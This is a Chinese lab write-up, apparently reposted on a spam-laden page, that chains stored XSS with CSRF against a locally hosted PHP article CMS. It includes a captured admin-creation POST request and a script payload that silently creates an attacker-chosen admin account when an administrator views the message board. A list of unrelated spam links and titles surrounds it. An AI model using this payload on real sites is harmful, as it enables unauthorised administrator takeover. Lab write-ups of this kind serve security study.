当前位置: 首页 > news >正文

女与男做那个的视频网站wordpress 服务器配置

女与男做那个的视频网站,wordpress 服务器配置,域名申请通过了网站怎么做,制作一个网站多少钱啊项目背景#xff1a; 如下#xff1a;我们是在一个类似文章管理系统的网站上面发现的该漏洞。我们将其运行在本地的phpstudy集成环境上面。 源码地址下载链接#xff1a;https://pan.baidu.com/s/1MpnSAq7a_oOcGh4XgPE-2w 提取码#xff1a;4444 考察内容#xff1a; …项目背景 如下我们是在一个类似文章管理系统的网站上面发现的该漏洞。我们将其运行在本地的phpstudy集成环境上面。 源码地址下载链接https://pan.baidu.com/s/1MpnSAq7a_oOcGh4XgPE-2w  提取码4444 考察内容 本次实验使用的存储型xss与csrf的联合使用。我们使用这两个漏洞可以使当管理员查看留言板后自动触发使其自动创建一个管理员账号。本网站并没有使用token值来防止csrf所以我们才能够利用。 前提我们是在拥有管理员权限的情况下进行的。 大致流程 1分析发现存储型xss漏洞 2发现该网站并无token值可以进行csrf 3使用js伪造创建管理员的form表单 4当管理员查看留言板后自动触发xss创建一个攻击者自己定义的管理员账号。 开始实验 1发现存储xss 发现该网站存在一个留言板其中的内容会存入数据库中管理员会不定期去查看留言板中的内容。如下经过测试我们发现当我们将恶意的js代码放到内容板块中存入数据库当管理员去查看留言信息后就会自动触发js恶意代码 管理员查看留言板可以发现自动弹窗了说明这里存在一个存储型xss。 2该网站并没有使用token值来防止csrf接下来我们使用抓包工具burp suite来抓创建管理员的包需要打开代理设置指向抓包工具burp suite这个操作比较简单不会的可以进行百度: 创建管理员页面 抓包 POST /admin/user.action.php HTTP/1.1 Host: cms:1234 Content-Length: 94 Cache-Control: max-age0 Upgrade-Insecure-Requests: 1 Origin: http://cms:1234 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7 Referer: http://cms:1234/admin/user.add.php?actadd Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q0.9,en;q0.8,en-GB;q0.7,en-US;q0.6 Cookie: usernameadmin; userid1; PHPSESSID0m903rglk205acbq8ol191q271 Connection: closeactaddusername2password2password22button%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7userid0 通过对抓到的包分析我们可以发现该包使用的是POST方式进行提交将参数提交到/admin/user.action.php进行处理。所以我们就可以根据这个包中的内容进行伪造。 3使用js伪造创建管理员账号的form表单 script xmlhttp new XMLHttpRequest(); xmlhttp.open(post,http://cms:1234/admin/user.action.php,false); xmlhttp.setRequestHeader(Content-type,application/x-www-form-urlencoded); xmlhttp.send(actaddusernameDJJpassword123456password2123456button%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7userid0); /script 整个js的操作是创建管理员的操作不过是由js自动触发。 xmlhttp.open提交地址 xmlhttp.setRequestHeaderpost的请求头 xmlhttp.sendpost中的参数创建的账号密码等 4将伪造的恶意js代码上传留言板当管理员查看留言信息后自动触发创建一个新的管理员账号。 5管理员查看留言板触发存储xss创建管理员账号。 如下当我们查看留言板后在去查看管理员账号信息发现已经自动创建了一个我们定义的管理员账号。
http://www.hkea.cn/news/14390930/

相关文章:

  • 莆田网站开发公司电话网站开发付款方式
  • 邵阳 网站开发 招聘公司注册地址费用
  • 微网站建设平台无锡网站建设价格最优
  • 塔城市建设局网站影视广告制作公司
  • 手机网站制作wordpress论坛模版
  • 怎么把东西发布到网上卖宁波seo优化服务
  • 做h5比较好的网站c 视频网站开发入门
  • dede企业网站带留言板后台查询千锋教育官网
  • 免费代理免费拿货seo怎么推广
  • 长春做网站优化价格福州seo排名外包
  • 手机建网站制作合肥做网站好的公司哪家好
  • 网站建设 媒体广告建模教程
  • 苏州企业建设网站服务做一个搜索引擎网站要多少钱
  • 广东工程建设咨询有限公司网站桂林网红民宿
  • 北京app建设 网站开发公司中山网站建设技术
  • 2018网站的建设与维护前景建筑局网站
  • 云南网站建设优化技术学校网站怎么做优化
  • 济南医院网站建设服务公司青海移动网站建设
  • 怎么使用dw做一个网站微信群
  • 城乡建设规划网站抖音宣传推广
  • 安徽省住房和城乡建设厅网站查询mugeda做网站
  • 东莞教育建站藁城外贸网站建设
  • 08 iis创建网站曹妃甸建设工程招投标网站
  • 网站没有访问量营销网站建设品牌企业
  • 哈尔滨网站建设招聘网站建设相关图片
  • 营口网站开发公司合肥优秀网站建设
  • 网站管理系统改不了的wordpress博客被书为什么还
  • 青岛网站推跨境电商运营主要做什么
  • 怎么买网站免费一键生成转账截图
  • 做化妆品代理在那些网站比较多潍坊英文网站建设